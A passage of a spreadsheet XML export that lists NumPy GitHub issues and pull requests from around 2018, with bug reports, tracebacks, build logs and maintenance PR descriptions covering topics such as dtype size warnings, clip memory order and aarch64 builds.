    <t>This pull requests adds back filters for the Cython-related RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88</t>
  </si>
  <si>
    <t>MAINT: Filter Cython warnings in `__init__.py`</t>
  </si>
  <si>
    <t>['03 - Maintenance', '06 - Regression']</t>
  </si>
  <si>
    <t>I have been using `np.loadtxt()` to happily load `txt.bz2` files for many years. I recently upgraded to numpy 1.14.2, and I noticed that it no longer seems possible to load a `txt.bz2` file using python2. _x000D_
_x000D_
Was this intensional, or some sort of bug?_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "/Users/danhickstein/Documents/GitHub/PyAbel-DH/examples/example_all_O2.py", line 41, in &lt;module&gt;_x000D_
    IM = np.loadtxt('data/O2-ANU1024.txt.bz2')_x000D_
  File "/anaconda2/lib/python2.7/site-packages/numpy/lib/npyio.py", line 917, in loadtxt_x000D_
    fh = np.lib._datasource.open(fname, 'rt', encoding=encoding)_x000D_
  File "/anaconda2/lib/python2.7/site-packages/numpy/lib/_datasource.py", line 260, in open_x000D_
    return ds.open(path, mode, encoding=encoding, newline=newline)_x000D_
  File "/anaconda2/lib/python2.7/site-packages/numpy/lib/_datasource.py", line 614, in open_x000D_
    encoding=encoding, newline=newline)_x000D_
  File "/anaconda2/lib/python2.7/site-packages/numpy/lib/_datasource.py", line 88, in _python2_bz2open_x000D_
    raise ValueError("bz2 text files not supported in python2")_x000D_
ValueError: bz2 text files not supported in python2_x000D_
```</t>
  </si>
  <si>
    <t>np.loadtxt no longer loads bz2 files in python2</t>
  </si>
  <si>
    <t>['06 - Regression', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
if we apply expand_dims to a numpy array 'a' :_x000D_
b = numpy.expand_dims(a, axis=0)_x000D_
the 'b' is not a new array, it will be a link to the objects 'a'_x000D_
_x000D_
is it correct behavior?_x000D_
if so, it should be noted in the manual_x000D_
_x000D_
thanks!</t>
  </si>
  <si>
    <t>DOC: expand_dims returns a view</t>
  </si>
  <si>
    <t>Probably just an oddity and me being a bit annoyed/surprised by it, please go ahead and simply close again, but I was confused that when trying to test a bit on the plane I got failures because I was offline. Those come from DataSource, which possibly should just be deprecated anyway (but I have no idea who might be using it).</t>
  </si>
  <si>
    <t>TST: DataSource test require to be online</t>
  </si>
  <si>
    <t>Just for reference: It's mentioned as new in the [1.13 release notes](https://docs.scipy.org/doc/numpy/release.html#numpy-1-13-0-release-notes)_x000D_
_x000D_
&gt; New np.isnat ufunc tests for NaT special values.</t>
  </si>
  <si>
    <t>DOC: Include the versionadded to the isnat documentation.</t>
  </si>
  <si>
    <t xml:space="preserve">After `pip install numpy` 1.15 from a wheel,_x000D_
_x000D_
    print "np.dtype.__basicsize__:", np.dtype.__basicsize__  # 96_x000D_
    print "scipy.dtype.__basicsize__:", scipy.dtype.__basicsize__  # 96_x000D_
    from scipy import stats_x000D_
    ~ 20 RuntimeWarning: numpy.dtype size   changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
_x000D_
(Please add labels, don't see them; is there a label "strange" ?)_x000D_
_x000D_
A shell script to reproduce this:_x000D_
_x000D_
    #!/bin/bash_x000D_
    # re-install numpy scipy: https://github.com/numpy/numpy/issues/11537  denis 27july_x000D_
_x000D_
    ( cd $site;  rm -r tmp;  mkdir tmp;  mv numpy* scipy* tmp )_x000D_
    rm -r ~/Library/Caches/pip_x000D_
_x000D_
    #..............................................................................._x000D_
    pip2 install --user numpy scipy_x000D_
_x000D_
    python2 -c '_x000D_
    import sys_x000D_
    import numpy as np_x000D_
    import scipy_x000D_
_x000D_
    print "versions: numpy %s  scipy %s  python %s  " % (_x000D_
    		np.__version__, scipy.__version__ , sys.version )_x000D_
    print "np.dtype.__basicsize__:", np.dtype.__basicsize___x000D_
    print "scipy.dtype.__basicsize__:", scipy.dtype.__basicsize___x000D_
_x000D_
    from scipy import stats_x000D_
    '_x000D_
_x000D_
    pip2 --version_x000D_
    ls -l $site/scipy/*/*cython*.so_x000D_
    otool -L $site/scipy/*/*cython*.so  # mac_x000D_
_x000D_
and the logfile:_x000D_
_x000D_
    Collecting numpy_x000D_
      Downloading https://files.pythonhosted.org/packages/3c/bf/e36756c562f7386be78c6942f0a8a647ee4eb374cdf219bece7054832b14/numpy-1.15.0-cp27-cp27m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.whl (24.5MB)_x000D_
    Collecting scipy_x000D_
      Downloading https://files.pythonhosted.org/packages/d1/d6/3eac96ffcf7cbeb37ed72982cf3fdd3138472cb04ab32cdce1f444d765f2/scipy-1.1.0-cp27-cp27m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.whl (16.8MB)_x000D_
    Installing collected packages: numpy, scipy_x000D_
      The scripts conv-template, f2py and from-template are installed in '/Users/bz/Library/Python/2.7/bin' which is not on PATH._x000D_
      Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location._x000D_
    Successfully installed numpy-1.15.0 scipy-1.1.0_x000D_
    versions: numpy 1.15.0  scipy 1.1.0  python 2.7.15 (v2.7.15:ca079a3ea3, Apr 29 2018, 20:59:26) _x000D_
    [GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)]  _x000D_
    np.dtype.__basicsize__: 96_x000D_
    scipy.dtype.__basicsize__: 96_x000D_
    /Library/Python/2.7/site-packages/scipy/special/__init__.py:640: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._ufuncs import *_x000D_
    /Library/Python/2.7/site-packages/scipy/linalg/basic.py:17: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._solve_toeplitz import levinson_x000D_
    /Library/Python/2.7/site-packages/scipy/linalg/__init__.py:207: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._decomp_update import *_x000D_
    /Library/Python/2.7/site-packages/scipy/special/_ellip_harm.py:7: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._ellip_harm_2 import _ellipsoid, _ellipsoid_norm_x000D_
    /Library/Python/2.7/site-packages/scipy/interpolate/_bsplines.py:10: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from . import _bspl_x000D_
    /Library/Python/2.7/site-packages/scipy/sparse/lil.py:19: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from . import _csparsetools_x000D_
    /Library/Python/2.7/site-packages/scipy/sparse/csgraph/__init__.py:165: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._shortest_path import shortest_path, floyd_warshall, dijkstra,\_x000D_
    /Library/Python/2.7/site-packages/scipy/sparse/csgraph/_validation.py:5: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._tools import csgraph_to_dense, csgraph_from_dense,\_x000D_
    /Library/Python/2.7/site-packages/scipy/sparse/csgraph/__init__.py:167: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._traversal import breadth_first_order, depth_first_order, \_x000D_
    /Library/Python/2.7/site-packages/scipy/sparse/csgraph/__init__.py:169: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._min_spanning_tree import minimum_spanning_tree_x000D_
    /Library/Python/2.7/site-packages/scipy/sparse/csgraph/__init__.py:170: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._reordering import reverse_cuthill_mckee, maximum_bipartite_matching, \_x000D_
    /Library/Python/2.7/site-packages/scipy/spatial/__init__.py:95: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from .ckdtree import *_x000D_
    /Library/Python/2.7/site-packages/scipy/spatial/__init__.py:96: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from .qhull import *_x000D_
    /Library/Python/2.7/site-packages/scipy/spatial/_spherical_voronoi.py:18: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from . import _voronoi_x000D_
    /Library/Python/2.7/site-packages/scipy/spatial/distance.py:122: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from . import _hausdorff_x000D_
    /Library/Python/2.7/site-packages/scipy/optimize/_trlib/__init__.py:1: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._trlib import TRLIBQuadraticSubproblem_x000D_
    /Library/Python/2.7/site-packages/scipy/optimize/_numdiff.py:10: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from ._group_columns import group_dense, group_sparse_x000D_
    /Library/Python/2.7/site-packages/scipy/stats/_continuous_distns.py:18: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
      from . import _stats_x000D_
    pip 18.0 from /Library/Python/2.7/site-packages/pip (python 2.7)_x000D_
    -rwxr-xr-x 1 bz admin  306652 Jul 27 11:34 /Library/Python/2.7/site-packages/scipy/linalg/cython_blas.so_x000D_
    -rwxr-xr-x 1 bz admin  817100 Jul 27 11:34 /Library/Python/2.7/site-packages/scipy/linalg/cython_lapack.so_x000D_
    -rwxr-xr-x 1 bz admin 2738116 Jul 27 11:34 /Library/Python/2.7/site-packages/scipy/special/cython_special.so_x000D_
    /Library/Python/2.7/site-packages/scipy/linalg/cython_blas.so:_x000D_
    	@loader_path/../.dylibs/libgfortran.3.dylib (compatibility version 4.0.0, current version 4.0.0)_x000D_
    	/System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate (compatibility version 1.0.0, current version 4.0.0)_x000D_
    	/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1238.60.2)_x000D_
    	@loader_path/../.dylibs/libgcc_s.1.dylib (compatibility version 1.0.0, current version 1.0.0)_x000D_
    	@loader_path/../.dylibs/libquadmath.0.dylib (compatibility version 1.0.0, current version 1.0.0)_x000D_
    /Library/Python/2.7/site-packages/scipy/linalg/cython_lapack.so:_x000D_
    	@loader_path/../.dylibs/libgfortran.3.dylib (compatibility version 4.0.0, current version 4.0.0)_x000D_
    	/System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate (compatibility version 1.0.0, current version 4.0.0)_x000D_
    	/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1238.60.2)_x000D_
    	@loader_path/../.dylibs/libgcc_s.1.dylib (compatibility version 1.0.0, current version 1.0.0)_x000D_
    	@loader_path/../.dylibs/libquadmath.0.dylib (compatibility version 1.0.0, current version 1.0.0)_x000D_
    /Library/Python/2.7/site-packages/scipy/special/cython_special.so:_x000D_
    	@loader_path/../.dylibs/libgfortran.3.dylib (compatibility version 4.0.0, current version 4.0.0)_x000D_
    	/System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate (compatibility version 1.0.0, current version 4.0.0)_x000D_
    	/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1238.60.2)_x000D_
    	@loader_path/../.dylibs/libgcc_s.1.dylib (compatibility version 1.0.0, current version 1.0.0)_x000D_
    	@loader_path/../.dylibs/libquadmath.0.dylib (compatibility version 1.0.0, current version 1.0.0)_x000D_
</t>
  </si>
  <si>
    <t>pip install numpy 1.15 from wheel: numpy.dtype size changed Expected 96, got 88</t>
  </si>
  <si>
    <t xml:space="preserve">Adds the show call to display the contourf in meshgrid docs. </t>
  </si>
  <si>
    <t>DOC: Show plot in meshgrid example.</t>
  </si>
  <si>
    <t>With the `intel` / fat `python` binaries provided by the python.org installers, trying to import in 32-bit mode fails with:_x000D_
_x000D_
```_x000D_
$ arch -32 /Library/Frameworks/Python.framework/Versions/3.6/bin/python -c "import numpy as np; print(np)"_x000D_
Traceback (most recent call last):_x000D_
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/core/__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
ImportError: dlopen(/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/core/multiarray.cpython-36m-darwin.so, 2): Library not loaded: /usr/local/gfortran/lib/i386/libgfortran.3.dylib_x000D_
  Referenced from: /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/.dylibs/libopenblasp-r0.3.0.dev.dylib_x000D_
  Reason: image not found_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;string&gt;", line 1, in &lt;module&gt;_x000D_
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import add_newdocs_x000D_
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/add_newdocs.py", line 13, in &lt;module&gt;_x000D_
    from numpy.lib import add_newdoc_x000D_
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/lib/__init__.py", line 8, in &lt;module&gt;_x000D_
    from .type_check import *_x000D_
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/lib/type_check.py", line 11, in &lt;module&gt;_x000D_
    import numpy.core.numeric as _nx_x000D_
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/core/__init__.py", line 26, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError:_x000D_
Importing the multiarray numpy extension module failed.  Most_x000D_
likely you are trying to import a failed build of numpy._x000D_
If you're working with a numpy git repo, try `git clean -xdf` (removes all_x000D_
files not under version control).  Otherwise reinstall numpy._x000D_
_x000D_
Original error was: dlopen(/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/core/multiarray.cpython-36m-darwin.so, 2): Library not loaded: /usr/local/gfortran/lib/i386/libgfortran.3.dylib_x000D_
  Referenced from: /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/numpy/.dylibs/libopenblasp-r0.3.0.dev.dylib_x000D_
  Reason: image not found_x000D_
```_x000D_
_x000D_
[Similar errors][1] occur in 2.7 and 3.5._x000D_
_x000D_
[1]: https://gist.github.com/dhermes/bfc9c082797ea5d65d46d64aa742175d</t>
  </si>
  <si>
    <t>OS X 32-bit wheels fail import in 1.15.0</t>
  </si>
  <si>
    <t>Change the documentation of inputs from "symmetric or Hermitian" to "real symmetric or complex Hermitian" for eigh and eigvalsh.</t>
  </si>
  <si>
    <t>DOC: Use "real symmetric" rather than "symmetric" in ``eigh`` and ''eigvalsh" docs.</t>
  </si>
  <si>
    <t>i.e:_x000D_
 a=[2,0,-1,3]_x000D_
 np.argsort(a)_x000D_
 output is right:_x000D_
array([2, 1, 0, 3], dtype=int64)_x000D_
_x000D_
but:_x000D_
 a=[2,-1,0,3]_x000D_
 np.argsort(a)_x000D_
output has soemthing wrong:_x000D_
 array([1, 2, 0, 3], dtype=int64)_x000D_
The correct outpus should be:_x000D_
 array([2, 0, 1, 3], dtype=int64)</t>
  </si>
  <si>
    <t>np.argsort() has something wrong</t>
  </si>
  <si>
    <t>This was introduced in NEP 13 (ufunc overrides), it should be removed again. Currently the doc build looks for a `dot` command-line executable, and this name is apparently not even os-independent (see Sphinx docs [here](http://www.sphinx-doc.org/en/master/usage/extensions/graphviz.html#confval-graphviz_dot))._x000D_
_x000D_
Possible alternative to removal: there seem to be some packages on PyPI that implement simplified versions of the Graphviz dot language. Probably not worth it (easier to just commit a couple of pngs), but is an option._x000D_
_x000D_
Current end of doc build:_x000D_
```_x000D_
Warning, treated as error:_x000D_
dot command 'dot' cannot be run (needed for graphviz output), check the graphviz_dot setting_x000D_
make: *** [html] Error 1_x000D_
```</t>
  </si>
  <si>
    <t>unwanted dependency on graphviz for NEPs doc build</t>
  </si>
  <si>
    <t>Please take a look @hameerabbasi @mhvk @mrocklin @eric-wieser _x000D_
_x000D_
Once we merge this, I think we're ready to send it out to the list for final approval?</t>
  </si>
  <si>
    <t>DOC: add a brief note on "Protocols for methods" to NEP 18</t>
  </si>
  <si>
    <t>First commit just fixes the transpose bug, second commit makes it so that it checks for overlap on the argument.</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: Clip uses wrong memory order in output </t>
  </si>
  <si>
    <t>Currently `np.random.geometric(0) =&gt; -9223372036854775808`</t>
  </si>
  <si>
    <t>BUG: have geometric() raise ValueError on p=0</t>
  </si>
  <si>
    <t>Together with @rgommers we refined the last roadmap version that he and @shoyer worked on further.  We think this is now pretty close to ready, so please go ahead and review (comments to the mailing list, please)._x000D_
_x000D_
https://mail.python.org/pipermail/numpy-discussion/2018-July/078458.html_x000D_
_x000D_
I've also added a section to the NEP website to host it.</t>
  </si>
  <si>
    <t>NEP: Add roadmap section and subdocuments to NEPs</t>
  </si>
  <si>
    <t>First attempt at trying to get C source line coverage reported via codecov; inspired by the SciPy approach to doing this, but will almost certainly fail initially due to some differences between the CI setup for the two projects.</t>
  </si>
  <si>
    <t>TST: including C source line coverage for CI / codecov</t>
  </si>
  <si>
    <t>[ci skip]_x000D_
_x000D_
I rephrased the [mail](https://mail.python.org/pipermail/numpy-discussion/2018-July/078428.html) sent out on behalf of the steering council to formalize the policy. Obviously I may have misinterpreted or phrased things poorly, please feel free to edit-and-push this PR.</t>
  </si>
  <si>
    <t>DOC: add commit bit policy to governance document</t>
  </si>
  <si>
    <t>DOC: Post 1.15.0 release updates for master.</t>
  </si>
  <si>
    <t>### Issue_x000D_
If `clip` is called with an `out` argument that is not C-contiguous, the data will be stored to `foo` in the wrong order. This issue appears to be specific to `clip`, and does not occur e.g. with `abs`._x000D_
_x000D_
### Versions_x000D_
This issue was observed with Python 3.6.6 and Numpy 1.14.5 on Linux, installed using Conda._x000D_
_x000D_
### Sample code_x000D_
_x000D_
Input:_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
x = np.arange(4).reshape(2, 2)_x000D_
print(x)_x000D_
_x000D_
y = np.zeros_like(x).T_x000D_
np.abs(x, out=y)_x000D_
print(y)_x000D_
_x000D_
y = np.zeros_like(x).T_x000D_
np.clip(x, 0, None, out=y)_x000D_
print(y)_x000D_
```_x000D_
_x000D_
Output:_x000D_
```python_x000D_
[[0 1]_x000D_
 [2 3]]_x000D_
[[0 1]_x000D_
 [2 3]]_x000D_
[[0 2]_x000D_
 [1 3]]_x000D_
```</t>
  </si>
  <si>
    <t>BUG: clip(out=foo) assumes foo is C-contiguous</t>
  </si>
  <si>
    <t>This fails on my lapack, so sending to CI to try and bisect a working lapack version. For me, it fails with:_x000D_
_x000D_
    ValueError: On entry to DLALSD parameter number 4 had an illegal value_x000D_
_x000D_
We don't even call that routine directly, so this is definitely a LAPACK bug._x000D_
_x000D_
Alternative to gh-11594</t>
  </si>
  <si>
    <t>WIP: Allow lstsq on empty arrays</t>
  </si>
  <si>
    <t>Backport of #11598._x000D_
_x000D_
Add testing with Python 3.7 to both appveyor and travis.</t>
  </si>
  <si>
    <t>TST: Add Python 3.7 to CI testing (#11598)</t>
  </si>
  <si>
    <t>Related to #6584 _x000D_
_x000D_
Previously the former would succeed, but the latter would fail with a cryptic error message.</t>
  </si>
  <si>
    <t xml:space="preserve"> BUG: Make np.array([[1], 2]) and np.array([1, [2]]) behave in the same way</t>
  </si>
  <si>
    <t>WIP, TST: Add more Python 3.7 testing.</t>
  </si>
  <si>
    <t>Add Python 3.7 to CI testing.  Note that on travis-ci it must run with sudo on xenial, see travis-ci/travis-ci#9069.</t>
  </si>
  <si>
    <t>TST: Add Python 3.7 to CI testing</t>
  </si>
  <si>
    <t>NEP: backwards compatibility and deprecation policy</t>
  </si>
  <si>
    <t>['04 - Documentation', '16 - Development', 'component: NEP']</t>
  </si>
  <si>
    <t>Fixes #11589 _x000D_
_x000D_
PR #11043 added a check for Nan in the minimum, maximum loops._x000D_
_x000D_
Scalars and `float16` take a different code path through maximum, minimum that was not checked. Tests added that failed before and pass after the fix.</t>
  </si>
  <si>
    <t>BUG:warn on Nan in minimum,maximum for scalars, float16</t>
  </si>
  <si>
    <t xml:space="preserve">Added support for empty matrices in linalg.lstsq with tests_x000D_
_x000D_
Relates to #8654 </t>
  </si>
  <si>
    <t>ENH: support for empty matrices in linalg.lstsq</t>
  </si>
  <si>
    <t>handle empty matrices in qr decomposition; added tests</t>
  </si>
  <si>
    <t>ENH: handle empty matrices in qr decomposition</t>
  </si>
  <si>
    <t>DOC: add Stefan van der Walt to Steering Council</t>
  </si>
  <si>
    <t>The example of specific test selection in `runtests.py` is a little out of date since it uses the old `nose` syntax. I've added the extra colon used [in pytest test specification](https://docs.pytest.org/en/latest/usage.html#specifying-tests-selecting-tests) (they call these node ids for tests) so that users don't get confused if they copy / paste from that example._x000D_
_x000D_
In general, the `path/to/test_mod.py::TestClass::test_method` syntax can be hard to remember if you don't use it often.</t>
  </si>
  <si>
    <t>MAINT: update runtests.py node id example for pytest usage</t>
  </si>
  <si>
    <t>Now that NEP 19 has been accepted, what is the path forward to extending the `numpy.random` module? Do we point people to [randomgen](https://github.com/bashtage/randomgen) or do we somehow incorporate it into NumPy itself?</t>
  </si>
  <si>
    <t>ENH: Implement NEP 19 Random Number Generator Policy (tracker issue)</t>
  </si>
  <si>
    <t>I'm having issues using np.histogram with certain arrays of 32-bit values. For example:_x000D_
_x000D_
```python_x000D_
In [17]: np.histogram(np.array([-96.84163 , -14.239843], dtype=np.float32), range=(-96.84162582956903, 0.0), bins=10)_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-17-35074303c1c0&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.histogram(np.array([-96.84163 , -14.239843], dtype=np.float32), range=(-96.84162582956903, 0.0), bins=10)_x000D_
_x000D_
~/miniconda3/envs/dev/lib/python3.6/site-packages/numpy/lib/function_base.py in histogram(***failed resolving arguments***)_x000D_
    810             else:_x000D_
    811                 n += np.bincount(indices, weights=tmp_w,_x000D_
--&gt; 812                                  minlength=n_equal_bins).astype(ntype)_x000D_
    813     else:_x000D_
    814         # Compute via cumulative histogram_x000D_
_x000D_
ValueError: 'list' argument must have no negative elements_x000D_
```_x000D_
_x000D_
This is with Numpy 1.14.3</t>
  </si>
  <si>
    <t>BUG: error in np.histogram with 32-bit values</t>
  </si>
  <si>
    <t>in numpy/core/function_base.py_x000D_
_x000D_
def linspaces ..._x000D_
_x000D_
return y.astype(dtype,copy=False) is obsolete_x000D_
-&gt; astype does not contain the "copy' parameter anymore_x000D_
_x000D_
please remove the copy=False in both return options</t>
  </si>
  <si>
    <t>core/function_base.py contains obsolete call for astype in def linspaces</t>
  </si>
  <si>
    <t>From the source code,_x000D_
_x000D_
```_x000D_
if replace:_x000D_
    if p is not None:_x000D_
        cdf = p.cumsum()_x000D_
        cdf /= cdf[-1]_x000D_
        uniform_samples = self.random_sample(shape)_x000D_
        idx = cdf.searchsorted(uniform_samples, side='right')_x000D_
        idx = np.array(idx, copy=False) # searchsorted returns a scalar_x000D_
    else:_x000D_
        idx = self.randint(0, pop_size, size=shape)_x000D_
```_x000D_
_x000D_
It seems that numpy.random.choice currently uses the multinominal resampling algorithm. However, as pointed out by Roger R. Labbe in [Kalman and Bayesian Filters in Python](https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python), section 12.8,_x000D_
_x000D_
`_x000D_
The performance of the multinomial resampling is quite bad... In practice both the stratified and systematic algorithms perform well and similarly across a variety of problems._x000D_
`_x000D_
_x000D_
So I think we can make numpy.random.choice support more algorithms, like residual resampling, systematic resampling and stratified resampling.</t>
  </si>
  <si>
    <t>numpy.random.choice may need to support more algorithms</t>
  </si>
  <si>
    <t>Currently, `numpy.random.shuffle` only supports shuffling along the first axis only. Many other Numpy functions support the `axis` keyword argument to specify the axis along which the respective operation should be applied, it would be great to have such an argument for this function as well.</t>
  </si>
  <si>
    <t>Add axis option to numpy.random.shuffle</t>
  </si>
  <si>
    <t xml:space="preserve">Bug fix for issue #11581 </t>
  </si>
  <si>
    <t>BUG: Add home directory to path for global .numpy-site.cfg file.</t>
  </si>
  <si>
    <t>In order for the inner loop of matmul to use BLAS, we need to be able to require contiguous input and output memory. Additionally, if there is memory overlap between the output and the input we must not write the results to the output array until looping is finished. `linalg` solves this problem by copying in the inner loop, which solves the first problem but not the second. `einsum` and `dot` solve this problem by not going through `PyUFunc_GenericFunction`, i.e. they are not true gufuncs. _x000D_
_x000D_
I can use a custom `ufunc-&gt;type_resolver` function for matmul to copy the inputs to contiguous memory and create an output array with writeback semantics, but there is nowhere to trigger resolution of those semantics after iterating. The most convenient thing would be to use iter operand flags to get the `NpyIter` to manage the writeback semantics for me. However, the `NPY_ITER_OVERLAP_ASSUME_ELEMENTWISE` defeats that strategy, it tells `NpyIter` to avoid creating a writeback buffer under conditions that matmul requires a writeback._x000D_
_x000D_
I tried one approach to solving this in PR #11381, which simply removed the `NPY_ITER_OVERLAP_ASSUME_ELEMENTWISE` flag from generalized ufuncs (ones that call `PyUFunc_GeneralizedFunction`). It seems people count on that behaviour, and so the PR was rejected._x000D_
_x000D_
This is an attempt at another approach, where the handling of the flags is pushed into the `ufunc-&gt;type_resolver` function, and I can override default behaviour in the matmul-specific one that anyhow I need in order to force input arrays to be contiguous._x000D_
_x000D_
In this first step, I create a generic function to set per-operand flags and use it in the three looping strategies. In later steps I will try to move the function into the generic `ufunc-&gt;type_resolver`.</t>
  </si>
  <si>
    <t>MAINT: refactor ufunc iter operand flags handling</t>
  </si>
  <si>
    <t>Backport of #11084._x000D_
_x000D_
Fixes #10821, and minimally edit the referenced page to mention `pytest` alternatives in each section where it is relevant._x000D_
_x000D_
Make some progress with #10856 "update documentation". Should I add a "deprecated" note to the different `numpy/testing/_private/decorators.py` functions as well, and note the `pytest` alternatives?</t>
  </si>
  <si>
    <t>DOC: link to TESTS.rst.txt testing guidelines, tweak testing docs</t>
  </si>
  <si>
    <t>Backport of #11568._x000D_
_x000D_
Closes #11564</t>
  </si>
  <si>
    <t>BLD: Modify cpu detection and printing to get working aarch64 build</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '08 - Backport', 'component: build', 'component: numpy.core']</t>
  </si>
  <si>
    <t>In short, local coverage tests (hopefully reported online soon from: #11567) indicated that we weren't unit testing for the proper handling of invalid kwargs for `np.broadcast_arrays()`._x000D_
_x000D_
In adding the unit test for this kwarg handling in this PR, I also noticed that the appropriate error **message** is not raised in Python 3 because `dict.keys()` is not a list anymore, so the test was also adjusted to verify the correct error message &amp; the associated source code modified to ensure an indexable object in Python 3.</t>
  </si>
  <si>
    <t>TST: add broadcast_arrays() kwarg unit test for TypeError</t>
  </si>
  <si>
    <t xml:space="preserve">Requires #11568 to actually build_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix printing of float128 on ARM</t>
  </si>
  <si>
    <t>Closes #11564</t>
  </si>
  <si>
    <t xml:space="preserve">BLD: Modify cpu detection and printing to get working aarch64 build </t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: build', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Added `RUN_COVERAGE` flag to specify whether to run code coverage and passed `--cov-report=xml` to pytest to output the code coverage report in XML. Report is uploaded to the [codecov](https://codecov.io) service._x000D_
_x000D_
I had to ignore depreciation warnings from virtualenv as it was erroring the tests in python3.6. Its still an open issue: https://github.com/pypa/virtualenv/issues/1120 _x000D_
_x000D_
Part of scipy2018 code sprint  🐍</t>
  </si>
  <si>
    <t>TST: Integrate codecov testing</t>
  </si>
  <si>
    <t>On OSX, `python runtests.py` fails because `runtests.py` adds some gcc-specific warnings flags. There is a check in `runtests.py` that attempts detect whether the C compiler is `gcc`, but it is fooled by Xcode developer tools. This change successfully differentiates between GNU gcc and gcc-that-is-actually-clang. I wish there were a more explicit way to switch on this, but this seems like the best available option. See [this gist](https://gist.github.com/danielballan/4a684ea4458a49fdd5d032c821e1daff) for the content of `distutils.sysconfig.get_config_vars()` on OSX and then, in a comment, the same output from Linux gnu-gcc compiler._x000D_
_x000D_
Thanks to @mattip for help, here at the SciPy Sprints! :tada:</t>
  </si>
  <si>
    <t>BLD: Do not use gcc warnings flags when 'gcc' is actually clang.</t>
  </si>
  <si>
    <t>Follow-up of gh-10350.  Closes gh-9416.</t>
  </si>
  <si>
    <t>MAINT: convert the doctests for polynomial to regular tests</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>The master branch currently fails to build on aarch64/ARMv8 with the following:_x000D_
_x000D_
```_x000D_
aarch64-linux-gnu-gcc: numpy/core/src/npymath/ieee754.c_x000D_
In file included from numpy/core/src/private/npy_config.h:6:0,_x000D_
                 from numpy/core/src/npymath/npy_math_common.h:8,_x000D_
                 from numpy/core/src/npymath/ieee754.c.src:7:_x000D_
numpy/core/include/numpy/npy_cpu.h:106:6: error: #error Unknown CPU, please report this to numpy maintainers with information about your platform (OS, CPU and compiler)_x000D_
     #error Unknown CPU, please report this to numpy maintainers with \_x000D_
      ^_x000D_
In file included from numpy/core/src/private/npy_config.h:6:0,_x000D_
                 from numpy/core/src/npymath/npy_math_common.h:8,_x000D_
                 from numpy/core/src/npymath/ieee754.c.src:7:_x000D_
numpy/core/include/numpy/npy_cpu.h:106:6: error: #error Unknown CPU, please report this to numpy maintainers with information about your platform (OS, CPU and compiler)_x000D_
